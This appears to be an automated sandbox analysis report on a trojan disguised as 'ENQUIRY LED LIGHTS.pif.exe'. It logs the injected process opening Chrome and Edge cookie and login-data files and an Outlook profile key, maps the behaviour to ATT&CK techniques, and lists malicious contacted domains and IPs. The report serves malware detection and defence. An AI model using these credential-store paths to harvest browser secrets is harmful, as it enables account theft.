            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe, Code function: 3_2_0044813F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_0044813F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match, File source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpack, type: UNPACKEDPE
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match, File source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpack, type: UNPACKEDPE

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 131 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 41 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | 114 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

            [Behavior graph: ID 1550102, Sample: ENQUIRY LED LIGHTS.pif.exe, Startdate: 06/11/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            ENQUIRY LED LIGHTS.pif.exe | 26% | ReversingLabs | Win32.Trojan.Sonbokli |
            ENQUIRY LED LIGHTS.pif.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            ontoweightloss.health | 3.33.130.190 | true | true | | unknown
            www.windowmart.online | 162.0.231.203 | true | true | | unknown
            www.asklifeclarity.shop | 75.2.103.23 | true | true | | unknown
            www.waidzeitcz.shop | 172.67.163.171 | true | true | | unknown
            15.164.165.52.in-addr.arpa | unknown | unknown | false | | high
            www.ontoweightloss.health | unknown | unknown | true | | unknown
            www.worldoffun.online | unknown | unknown | true | | unknown
                          NameMaliciousAntivirus DetectionReputation
                          Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                        https://www.waidzeitcz.shop/wishlist/SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.waidzeitcz.shop/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
